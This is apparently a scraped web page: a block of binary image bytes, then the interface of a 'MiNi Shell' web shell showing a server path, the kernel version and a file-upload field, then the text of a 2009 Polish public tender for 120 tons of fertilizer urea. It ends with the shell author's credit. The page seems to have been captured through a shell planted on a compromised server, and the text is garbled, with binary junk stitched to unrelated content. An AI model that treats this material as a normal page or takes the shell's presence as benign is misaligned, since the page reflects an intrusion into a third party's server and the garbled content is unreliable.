JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090211/24850-N-2009.html

<p class="kh_header"><b>Bonin: Dostawa mocznika nawozowego dla Zakładu Doświadczalnego Hodowli i Aklimatyzacji Roślin w Boninie k/Koszalina</b><br>
<b>Numer ogłoszenia: 24850 - 2009; data zamieszczenia: 11.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Hodowli i Aklimatyzacji Roślin Radzików, 05-870 Błonie Zakład Doświadczalny Hodowli i Aklimatyzacji Roślin Bonin k. Koszalina , 48, 76-009 Bonin, woj. zachodniopomorskie, tel. 0-94 346 12 29, 0-94 342-69-62, faks 0-94 346 12 29, 0-94 342-69-62.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka badawczo-rozwojowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mocznika nawozowego dla Zakładu Doświadczalnego Hodowli i Aklimatyzacji Roślin w Boninie k/Koszalina.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa mocznika nawozowego w ilości 120 ton dla Zakładu Doświadczalnego Hodowli i Aklimatyzacji Roślin w Boninie. 

 PRZEDMIOT  ZAMÓWIENIA OBEJMUJE:

1.  MOCZNIK NAWOZOWY W ILOŚCI 120 TON
    Wymagana charakterystyka mocznika nawozowego:
- zawartość azotu całkowitego co najmniej 46% (m/m)
- uziarnienie: 1-4mm: min 90%	
- sypkość co najmniej 90% (m/m)
Mocznik nawozowy ma być znakowany i pakowany zgodnie z normą PN-C-87001:1998.
Opakowanie zabezpieczające nawóz przed zmianą jakości mający wymiary zgodne                 z PN-8910-79021.
Mocznik nawozowy ma być dostarczony w kontenerach elastycznych typu big-bag.

2.  Miejscem dostaw mocznika nawozowego  będzie siedziba  Zamawiającego mieszcząca się                  w Boninie (gmina Manowo, powiat Koszalin, woj. zachodniopomorskie).
3. Dostarczony mocznik nawozowy musi posiadać wymogi zgodne z Rozporządzeniem Ministra Rolnictwa i Rozwoju Wsi  z 18 czerwca 2008r. w sprawie wykonania niektórych przepisów ustawy o nawozach i nawożeniu (Dz. U. Nr 119 poz. 765).
4. Wielkość i zakres zamówienia:
1)szacunkowa ilość zamawianego mocznika nawozowego 120 ton,
2)Zamawiający zastrzega sobie prawo do odstąpienia od realizacji części przedmiotu zamówienia - w przypadku niewykorzystania ilości mocznika nawozowego wskazanej w pkt III ust 4.1 Zamawiający będzie miał prawo do rezygnacji z dalszych dostaw, bez jakichkolwiek konsekwencji finansowych i odszkodowań na rzecz Wykonawcy,
3)w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W takim przypadku Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.

5. Warunki realizacji dostawy:
1)Wykonawca będzie realizował dostawę  mocznika nawozowego po uprzednim złożeniu zamówienia :pisemnym lub faksem przez Zamawiającego w terminie nie przekraczającym          5 dni od daty otrzymania zamówienia,
2) po dokonaniu dostawy mocznika nawozowego w oparciu o dokument WZ poświadczony przez przedstawiciela Zamawiającego oraz protokół podpisany przez Zamawiającego stwierdzający odbiór przedmiotu umowy bez wad i uwag Wykonawca wystawi fakturę VAT.
3) dostawa mocznika nawozowego następować będzie transportem Wykonawcy na jego koszt i ryzyko do miejsca wskazanego w roz. III ust. 2 S.I.W.Z.,
4) ewentualne niezgodności co do wymogów jakościowych  na mocznik nawozowy danej partii z parametrami określonymi w S.I.W.Z. oraz przedłożonej ofercie Wykonawcy będzie uznane za dostawę niezgodną z zamówieniem i będzie podlegało reklamacji- w trybie i na zasadach określonych w ust. 7.
6. Warunki gwarancji:
1)	Wykonawca gwarantuje jakość mocznika nawozowego zgodną z obowiązującymi normami i przepisami,
2)	Wykonawca zobowiązany będzie do załączenia dokumentów i świadectw jakościowych do każdej partii dostarczonego mocznika nawozowego  oraz przedstawienia ich  na każde życzenie Zamawiającego,
3)	Wykonawca pokryje wszelkie szkody powstałe z powodu złej jakości oferowanego mocznika nawozowego (niezgodności z normami).

7. Zamawiający zastrzega sobie prawo do pobrania próbki mocznika nawozowego w ilości 0,5 kg przy każdej dostawie. W przypadku stwierdzenia, iż mocznik nawozowy nie spełnia wymogom określonych w S.I.W.Z. (rozdział III-Przedmiot zamówienia oraz ofercie Wykonawcy) Zamawiający zwróci Wykonawcy całą partię mocznika nawozowego na koszt Wykonawcy. Wykonawca pokryje wszelkie szkody powstałe z powodu złej jakości dostarczonego mocznika nawozowego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 24.41.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w wysokości 2000,00zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki udziału w postępowaniu.

O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią następujące warunki:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj. koncesje w zakresie obrotu paliwami płynnymi;
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym              i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie  innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c) posiadają dokumentację potwierdzającą jakość przedmiotu zamówienia;
d)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
e)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia w oparciu                        o art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych;
f)podpiszą umowę na realizację dostawy na warunkach przedstawionych we wzorze umowy /załącznik nr 3 do S.I.W.Z./;
      g) udzielą gwarancji  na warunkach  przedstawionych   we wzorze umowy /załącznik nr 3 do S.I.W.Z./ i S.I.W.Z.;
h) spełniają pozostałe wymogi określone w niniejszej S.I.W.Z.;
i) wnieśli wadium w wysokości 2000,00zł.


2.Ocena spełnienia warunków w postępowaniu o zamówienie publiczne.
   1) Z ubiegania się o udzielenie zamówienia publicznego wyklucza się Wykonawców którzy:
a) nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art. 24 ust. 1 Prawa zamówień publicznych;
b) wykonywali bezpośrednio  czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców  w postępowaniu nie utrudni uczciwej konkurencji;
         c) złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
         d)wykonawców, którzy nie złożyli oświadczenia o spełnianiu warunków udziału 
w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust.3 ustawy Prawo zamówień publicznych;
         e) nie wnieśli wadium, w tym również na przedłużony okres związania ofertą lub nie zgodzili się na przedłużenie okresu związania ofertą. 

2)	Zamawiający odrzuca ofertę, która:
a)jest niezgodna z ustawą Prawo zamówień publicznych, 
b)jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia,                        z zastrzeżeniem art. 87 ust. 2 pkt 3 ustawy Prawo zamówień publicznych;
c)jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów                        o zwalczaniu nieuczciwej konkurencji;
d)zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia;
e)została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu                      o udzielenie zamówienia;
f)zawiera błędy w obliczeniu ceny;
g)wykonawca w terminie 3 dni od dnia otrzymania zawiadomienia  nie zgodził się na poprawienie omyłki, o której mowa w art.87 ust.2 pkt 3 ustawy Prawo zamówień publicznych;
h)jest nieważna na podstawie odrębnych przepisów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia     29 stycznia 2004 r. - Prawo zamówień publicznych, Wykonawca składa następujące dokumenty:
1.	Dokumenty wymagane:
1)	formularz ofertowy - Załącznik nr 2 do SIWZ;
2)	oświadczenie Wykonawcy w trybie art.22 ust.1 i art.24 ust.1 i 2 ustawy Pzp - Załącznik nr 2a do SIWZ;
3)	oświadczenie Wykonawcy - Załącznik nr 2b do SIWZ;
4)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
5)	dokumenty potwierdzające uprawnienie osób podpisujących ofertę i podejmowania zobowiązań, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych;
6)	pozwolenie na wprowadzenie do obrotu mocznika nawozowego wydane zgodnie               z wymogami ustawy z dnia 10.07.2007r. o nawozach i nawożeniu (Dz. U. Nr 147 poz. 1033).

2.	Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej
1)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
a)nie otwarto likwidacji ani nie ogłoszono upadłości,
b)nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
c)nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
2)	Jeżeli w kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów oraz informacji                          z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust. 1 pkt. 4-8 Prawa zamówień publicznych, zastępuje się dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

3. Dokumenty wymagane w przypadku składania oferty wspólnej - sposób składania dokumentów w ofercie wspólnej
1) umowa przedwstępna lub inny dokument potwierdzający  zawarcie umowy konsorcjum   
 podpisany przez wszystkich partnerów ( Wykonawców),
2)oferta wspólna powinna być sporządzana zgodnie z S.I.W.Z.,
3)dokumenty dot. własnej firmy takie jak: zaświadczenie o wpisie do ewidencji działalności gospodarczej, aktualny odpis z właściwego rejestru, oświadczenie Wykonawcy - załącznik 2a do S.I.W.Z. - składa każdy z Wykonawców (partnerów konsorcjum) składających ofertę wspólną w imieniu swojej firmy,
 4)dokumenty wspólne takie jak: formularz ofertowy (załącznik nr 2 do S.I.W.Z.), oświadczenie Wykonawcy (załącznik nr 2b do S.I.W.Z.) - składa pełnomocnik (lider konsorcjum) w imieniu wszystkich Wykonawców składających ofertę wspólną,
5) oferta powinna być  podpisana przez każdego z partnerów konsorcjum lub upoważnionego partnera (pełnomocnika) lidera konsorcjum,
6) pełnomocnictwo udzielone liderowi konsorcjum (zaleca się by był nim jeden                             z Wykonawców) do reprezentowania Wykonawców w postępowaniu, w tym podpisania oferty albo reprezentowania Wykonawców w postępowaniu, w tym podpisanie oferty                     i zawarcie umowy w sprawie zamówienia publicznego. Pełnomocnictwo to powinno być podpisane przez wszystkich Wykonawców z podpisami notarialnie poświadczonymi.                     Z załączonych do oferty dokumentów musi wynikać, iż osoby podpisujące pełnomocnictwo są upoważnione do składania oświadczeń woli w imieniu Wykonawcy. Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem (liderem konsorcjum)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - Termin płatności - 30</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdbonin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Doświadczalny Hodowli i Aklimatyzacji Roślin Bonin k/Koszalina
76-009 Bonin 48.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2009 godzina 10:00, miejsce: Zakład Doświadczalny Hodowli i Aklimatyzacji Roślin Bonin k/Koszalina
76-009 Bonin 48-sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com